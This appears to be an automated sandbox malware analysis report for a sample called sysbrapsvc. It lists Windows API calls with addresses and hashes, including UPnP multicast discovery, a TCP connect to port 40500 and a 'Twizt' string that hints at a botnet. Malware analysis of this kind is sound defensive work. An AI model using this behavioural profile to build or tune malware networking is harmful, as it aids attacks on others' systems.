                                                                                • Instruction ID: dd229b18b8e608a96638b9a50d19e2d27eaf393d2ffc9a5ffa46aac6cea4a516
                                                                                • Opcode Fuzzy Hash: 040756bc7d30765698bbdbc2b7edff8924aad6f67f943ab09c6075d22f1106d0
                                                                                • Instruction Fuzzy Hash: 7C21C3B1504301AFD304DF65DC84A6BB7E9EF88318F004A3EF555A6290E774D9588BEA
                                                                                APIs
                                                                                  • Part of subcall function 00407250: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFreeInstanceString
                                                                                • String ID: Microsoft Corporation
                                                                                • API String ID: 586785272-3838278685
                                                                                • Opcode ID: 690b5235c47795fc41d87c923ea1756cc9ab4385446be0044075a6540b9607f4
                                                                                • Instruction ID: 3bd6e37ccb81fb26e20ba6f4aecac2bab56e95e75b440682a2c5ba52433a4c42
                                                                                • Opcode Fuzzy Hash: 690b5235c47795fc41d87c923ea1756cc9ab4385446be0044075a6540b9607f4
                                                                                • Instruction Fuzzy Hash: 2D91EC75A0410ADFCB04DF94C894AAFB7B5BF49304F208169E515BB3E0D734AD41CBA6
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407EC8), ref: 0040DAFA
                                                                                  • Part of subcall function 0040DBC0: socket.WS2_32(00000002,00000002,00000011), ref: 0040DBDA
                                                                                  • Part of subcall function 0040DBC0: htons.WS2_32(0000076C), ref: 0040DC10
                                                                                  • Part of subcall function 0040DBC0: inet_addr.WS2_32(239.255.255.250), ref: 0040DC1F
                                                                                  • Part of subcall function 0040DBC0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DC3D
                                                                                  • Part of subcall function 0040DBC0: bind.WS2_32(000000FF,?,00000010), ref: 0040DC73
                                                                                  • Part of subcall function 0040DBC0: lstrlenA.KERNEL32(00411C48,00000000,?,00000010), ref: 0040DC8C
                                                                                  • Part of subcall function 0040DBC0: sendto.WS2_32(000000FF,00411C48,00000000), ref: 0040DC9B
                                                                                  • Part of subcall function 0040DBC0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DCB5
                                                                                  • Part of subcall function 0040DE30: SysFreeString.OLEAUT32(00000000), ref: 0040DF0B
                                                                                  • Part of subcall function 0040DE30: SysFreeString.OLEAUT32(00000000), ref: 0040DF15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                • String ID: TCP$UDP
                                                                                • API String ID: 1519345861-1097902612
                                                                                • Opcode ID: f2a508b97fbae45076dd5aa5ad3ba9adeb76e4e7dff97a5c25cb73082fa5fcae
                                                                                • Instruction ID: 6b43ad666573891978052671c2ef92d80966ae61c726f1f98895f42c7cfd0708
                                                                                • Opcode Fuzzy Hash: f2a508b97fbae45076dd5aa5ad3ba9adeb76e4e7dff97a5c25cb73082fa5fcae
                                                                                • Instruction Fuzzy Hash: 13117CB5D00208ABDB00EFE5DC46BAEB375EB44308F10856AE405772C6D7786A64CF9A
                                                                                APIs
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CF8C
                                                                                • InterlockedIncrement.KERNEL32(000000FF), ref: 0040CFC1
                                                                                • InterlockedDecrement.KERNEL32(000000FF), ref: 0040D0C4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$DecrementExchangeIncrement
                                                                                • String ID:
                                                                                • API String ID: 2813130747-0
                                                                                • Opcode ID: f07d07808116d01262f8deb1295e0be634e7f723a0f1bb6a6e3719addcf20d22
                                                                                • Instruction ID: c84f62e62097384c753cec2b1afe61742353190dca667db28db9568c8f96fbfb
                                                                                • Opcode Fuzzy Hash: f07d07808116d01262f8deb1295e0be634e7f723a0f1bb6a6e3719addcf20d22
                                                                                • Instruction Fuzzy Hash: 2241B4B5E00208ABDF00EBE4D845BAF7B75AF04308F04856DF5097B2C2D679D649C79A
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(Twizt,0040CFE6,0040CFE6,?,?,0040CFE6,000000FF,0040CFE6,0040CFE6,000000FF,00000000), ref: 0040B97C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen
                                                                                • String ID: Twizt$Twizt
                                                                                • API String ID: 1659193697-16428492
                                                                                • Opcode ID: cdfbb7bf72505eeb15b37c34f8babcdeb414b79efb373e01c93ed64440f99f30
                                                                                • Instruction ID: 4f272ba0ccffe3418a14e21f7fbe91cca6632783ddd3ea8ee3177eefa107642c
                                                                                • Opcode Fuzzy Hash: cdfbb7bf72505eeb15b37c34f8babcdeb414b79efb373e01c93ed64440f99f30
                                                                                • Instruction Fuzzy Hash: EB110DB5900108BFCB04DF98D945E9EB7B5EF48304F14C1A9FD19AB342D635EA11CBA6
                                                                                APIs
                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 0040D283
                                                                                • htons.WS2_32(00009E34), ref: 0040D2B5
                                                                                • connect.WS2_32(000000FF,?,00000010), ref: 0040D2CF
                                                                                  • Part of subcall function 0040AFF0: shutdown.WS2_32(0040AFDD,00000002), ref: 0040AFF9
                                                                                  • Part of subcall function 0040AFF0: closesocket.WS2_32(0040AFDD), ref: 0040B003
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: closesocketconnecthtonsshutdownsocket
                                                                                • String ID:
                                                                                • API String ID: 1987800339-0
                                                                                • Opcode ID: ad00b5e66e502cf51556e2fe0723fe5a46734f1a748e3451fb2f35000b259efe
                                                                                • Instruction ID: 6f27e87c9fbd885ae8dc1ff0d2584d57f1b5bd556a0886c013ee5925ca4f0c28
                                                                                • Opcode Fuzzy Hash: ad00b5e66e502cf51556e2fe0723fe5a46734f1a748e3451fb2f35000b259efe
                                                                                • Instruction Fuzzy Hash: 75110C74D05209EBCF14DFE8DA09AAEB774AF08320F2042ADE525A73D0E7748F05975A
                                                                                APIs
                                                                                  • Part of subcall function 0040A300: GetCurrentProcessId.KERNEL32(?,0040A26B,?,0040CB7E,00000010,?,?,?,?,?,?,0040C8EB), ref: 0040A303
                                                                                • HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,0040A277,?,0040CB7E,00000010,?,?,?,?,?,?,0040C8EB), ref: 0040A34C
                                                                                • HeapSetInformation.KERNEL32(02260000,00000000,00000002,00000004), ref: 0040A376
                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040A37C
                                                                                  • Part of subcall function 0040A390: GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A3AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentHeap$CreateHeapsInformation
                                                                                • String ID:
                                                                                • API String ID: 3179415709-0
                                                                                • Opcode ID: 39a68b1a461fe85ff5420ab9e490a0acce4aa907e117fd060a557965e8062ddb
                                                                                • Instruction ID: 153581d20db94d5c309eff678e55c8914b1996f7dedd943f89312b8a2df68ea8
                                                                                • Opcode Fuzzy Hash: 39a68b1a461fe85ff5420ab9e490a0acce4aa907e117fd060a557965e8062ddb
                                                                                • Instruction Fuzzy Hash: C4F096B0581318ABD314DB61BC05B663B75B704305F14C53AF9099A2D1EBB9D824C75B
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040EC40
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EC55
                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0040EC62
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$ChangeCloseCreateFindNotificationSize
                                                                                • String ID:
                                                                                • API String ID: 4178644524-0
                                                                                • Opcode ID: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
                                                                                • Instruction ID: 510e37a00670102d9d314512819d27ba5470aa4876814cd41fcb5fcea3dff8ee
                                                                                • Opcode Fuzzy Hash: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
                                                                                • Instruction Fuzzy Hash: CEF01274A40308FBDB10DFA4DD49B8DBB74AB04701F208155FA04B72D0D6B55A508B44
                                                                                APIs
                                                                                  • Part of subcall function 0040A300: GetCurrentProcessId.KERNEL32(?,0040A26B,?,0040CB7E,00000010,?,?,?,?,?,?,0040C8EB), ref: 0040A303
                                                                                • RtlAllocateHeap.NTDLL(02260000,?,-0000000C), ref: 0040A2AA
                                                                                • memset.NTDLL ref: 0040A2E4
                                                                                  • Part of subcall function 0040A320: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,0040A277,?,0040CB7E,00000010,?,?,?,?,?,?,0040C8EB), ref: 0040A34C
                                                                                  • Part of subcall function 0040A320: HeapSetInformation.KERNEL32(02260000,00000000,00000002,00000004), ref: 0040A376
                                                                                  • Part of subcall function 0040A320: GetCurrentProcessId.KERNEL32 ref: 0040A37C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
                                                                                • String ID:
                                                                                • API String ID: 3494217179-0
                                                                                • Opcode ID: 294fda0ab172e2a004a74a08390490f5fc4b4b9dca16f8036860c8ce0df5ca3a
                                                                                • Instruction ID: ba70c5eae7cf01fb33dfd467849f4f34152d1a70f2116d5db6fbc7e10e676d17
                                                                                • Opcode Fuzzy Hash: 294fda0ab172e2a004a74a08390490f5fc4b4b9dca16f8036860c8ce0df5ca3a
                                                                                • Instruction Fuzzy Hash: F5110375900208BBCB14DFE5D845F9E7BB9AF44308F04C1BDE909A7381D6399A54CB99
                                                                                APIs
                                                                                  • Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DA0D,00000000), ref: 004013D5
                                                                                  • Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                  • Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                  • Part of subcall function 0040B6B0: EnterCriticalSection.KERNEL32(0041AE68,?,?,0040D369), ref: 0040B6C0
                                                                                  • Part of subcall function 0040B6B0: LeaveCriticalSection.KERNEL32(0041AE68,?,?,0040D369), ref: 0040B6EC
                                                                                • InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040DA2D
                                                                                • WaitForSingleObject.KERNEL32(000005F4,00001388), ref: 0040DA77
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
                                                                                • String ID:
                                                                                • API String ID: 3920643007-0
                                                                                • Opcode ID: 5c77e3d312ad578ce08815b2cc1e62ae5db3b44bec38e6a5e784731c17f989e3
                                                                                • Instruction ID: aa17d1baa4e02fc33eb62529aa3b01015a1e888eeffea948add3cca91325e381
                                                                                • Opcode Fuzzy Hash: 5c77e3d312ad578ce08815b2cc1e62ae5db3b44bec38e6a5e784731c17f989e3
                                                                                • Instruction Fuzzy Hash: 3711A5B5E00208ABE700EBE0DC46BAF7734EB44704F10847AF501772D1E6759A40CB99
APIs
• gethostname.WS2_32(?,00000100), ref: 0040B29C
• gethostbyname.WS2_32(?), ref: 0040B2AE
Memory Dump Source
• Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
Yara matches
Similarity
• API ID: gethostbynamegethostname
• String ID:
• API String ID: 3961807697-0
• Opcode ID: aaec8b9e3ccfd23335778a95738de583a013869622460b5e30cdc36053fb7845
• Instruction ID: 8039f9734a4788e95ef973f6647f821cba33223e1e4c036a543b3ae581dc98b8
• Opcode Fuzzy Hash: aaec8b9e3ccfd23335778a95738de583a013869622460b5e30cdc36053fb7845
• Instruction Fuzzy Hash: B6112E34908118CBCB24CB14C848BD8B775EB65314F2486DAD88967390C7F9ADC5CF89
APIs
Memory Dump Source
• Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
Yara matches
Similarity
• API ID: gethostbynameinet_addr
• String ID:
• API String ID: 1594361348-0
• Opcode ID: c33f327bb9ec7267db1a3eace16e79cfc334ac04858cae8989207d18368f1188
• Instruction ID: a26dc96a0067a2b43ac3d3d1c1b84107ed873affba9b2e0c5737def7be7f7e0e
• Opcode Fuzzy Hash: c33f327bb9ec7267db1a3eace16e79cfc334ac04858cae8989207d18368f1188
• Instruction Fuzzy Hash: BFF01C78900208EFCB00DFB4E48889DBBB4EB48315F2083AAE905673A0D7709E80DB80
APIs
• WaitForSingleObject.KERNEL32(000005F4,000003E8), ref: 0040B8DE
• InterlockedDecrement.KERNEL32(00419828), ref: 0040B8F0
Memory Dump Source
• Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
Yara matches
Similarity
• API ID: DecrementInterlockedObjectSingleWait
• String ID:
• API String ID: 4086267124-0
• Opcode ID: 37923b9e3894ab7ac0eca60294d8a3c153e8bbf32d36ac9aea54317e710ac4f2
• Instruction ID: 70371dd39396dacd0ebacc4d3a7253ecf07d8a31bb2bfca86181530dfe316479
• Opcode Fuzzy Hash: 37923b9e3894ab7ac0eca60294d8a3c153e8bbf32d36ac9aea54317e710ac4f2
• Instruction Fuzzy Hash: 3BD05E3165030897CA006BA1B849B9A360EE710700B108433F240A11D0D7BC88C092EE
APIs
• shutdown.WS2_32(0040AFDD,00000002), ref: 0040AFF9
• closesocket.WS2_32(0040AFDD), ref: 0040B003
Memory Dump Source
• Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
Yara matches
Similarity
• API ID: closesocketshutdown
• String ID:
• API String ID: 572888783-0
• Opcode ID: bfbd7c6bd4046a28b837c812f6aa1fd48043d02f9901879055b44668827d2eb5
• Instruction ID: 69ce69260fc8840876d91afc79957fad69f2a54b7a8d7d483856da217b0a501e
• Opcode Fuzzy Hash: bfbd7c6bd4046a28b837c812f6aa1fd48043d02f9901879055b44668827d2eb5
• Instruction Fuzzy Hash: 04C04C7914120CBBCB049FE5ED4DDD97B6CEB4C651F008494FA098B251CBB6E980CB95
APIs
• EnterCriticalSection.KERNEL32(0041AE68,?,?,0040D369), ref: 0040B6C0
• LeaveCriticalSection.KERNEL32(0041AE68,?,?,0040D369), ref: 0040B6EC
Memory Dump Source
• Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
• API String ID: 3168844106-0
• Opcode ID: bcabc186306ba1e6db95b79a4a5ee2dd95fb67cbb7ec1f120a3790f6e9aeee7b
• Instruction ID: 13923c4bd5c8e2331a891100fe08006a79a1a16b838805fb2ea00da725e168b9
• Opcode Fuzzy Hash: bcabc186306ba1e6db95b79a4a5ee2dd95fb67cbb7ec1f120a3790f6e9aeee7b
• Instruction Fuzzy Hash: 4EE01AB59C2304EBCB05DB88EC49B9977B4E705314F148569F80953390D7BAAE60CA5F
APIs
• EnterCriticalSection.KERNEL32(0041AE68,?,0040B8A7), ref: 0040B018
• LeaveCriticalSection.KERNEL32(0041AE68,?,0040B8A7), ref: 0040B028
Memory Dump Source
• Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
• API String ID: 3168844106-0
• Opcode ID: 1fc6b865b111585f52b158b7dd66f0ac1bdef0efac2574f6e36ae78d8eeb1e27
• Instruction ID: 372b615c4b6dbe44d84b2135da3facd6a20cc6bc8964a13371f16c469ac31f8d
• Opcode Fuzzy Hash: 1fc6b865b111585f52b158b7dd66f0ac1bdef0efac2574f6e36ae78d8eeb1e27
• Instruction Fuzzy Hash: FDB09B715D131877810137D5AC0E7C5362CD550B55F144832F04D500559FEE3490855F
APIs
  • Part of subcall function 0040A300: GetCurrentProcessId.KERNEL32(?,0040A26B,?,0040CB7E,00000010,?,?,?,?,?,?,0040C8EB), ref: 0040A303
• RtlFreeHeap.NTDLL(02260000,00000000,00402612,?,00402612,?), ref: 0040A6BB
Memory Dump Source
• Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
Yara matches
Similarity
• API ID: CurrentFreeHeapProcess
• String ID:
• API String ID: 3855406826-0
• Opcode ID: 8534952d8c90e4d700e8dcba1ea12cabe14820986c13acf41758031b57988e10
• Instruction ID: 8dad1e0271eeb528323df75ad7ae4a1fb2206e9654044d15681f9d78fe5da1b6
• Opcode Fuzzy Hash: 8534952d8c90e4d700e8dcba1ea12cabe14820986c13acf41758031b57988e10
• Instruction Fuzzy Hash: 97F0C874900308AFDB04DF94D84096DBF75BF84304F14C1AAE9446B381FA36D951CB96
APIs
  • Part of subcall function 0040B6B0: EnterCriticalSection.KERNEL32(0041AE68,?,?,0040D369), ref: 0040B6C0
  • Part of subcall function 0040B6B0: LeaveCriticalSection.KERNEL32(0041AE68,?,?,0040D369), ref: 0040B6EC
• WaitForSingleObject.KERNEL32(000005F4,00001388), ref: 0040D38C
  • Part of subcall function 0040CF80: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CF8C
Memory Dump Source
• Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
• String ID:
• API String ID: 3309573332-0
• Opcode ID: 7eb5ed2af1fc3fd9af1decff1ab171505a9aa6000d5c3347444e91febc4f0f1a
• Instruction ID: af2a8be1c3b2022afcb85cbb4701cad0209fa058a067ecaf1ca36940e585286a
• Opcode Fuzzy Hash: 7eb5ed2af1fc3fd9af1decff1ab171505a9aa6000d5c3347444e91febc4f0f1a
• Instruction Fuzzy Hash: 3CE09270E00308E6D714A7A1A806BAF726A9710305F50857AFA007A2C1DA7E994883EE
APIs
• CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
Memory Dump Source
• Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
Yara matches
Similarity
• API ID: CreateInstance
• String ID:
• API String ID: 542301482-0
• Opcode ID: c09f913f08406f093c7ac86b5101c5a128e05d7496c9f4ec9220068c62795e96
• Instruction ID: d63025b72d2c6ebaad53fa266f334e56fbfbf26be99018a77b0022b5cf711e38
• Opcode Fuzzy Hash: c09f913f08406f093c7ac86b5101c5a128e05d7496c9f4ec9220068c62795e96
• Instruction Fuzzy Hash: 5FE0C97490120CBFDB40DF90C889B9EBBB8AB08315F1081A9E90467280D7B96A948BA5
APIs
  • Part of subcall function 004062C0: GetDriveTypeW.KERNELBASE(0040629F), ref: 004062CD
• lstrcpyW.KERNEL32(?,?), ref: 004062B3
Memory Dump Source
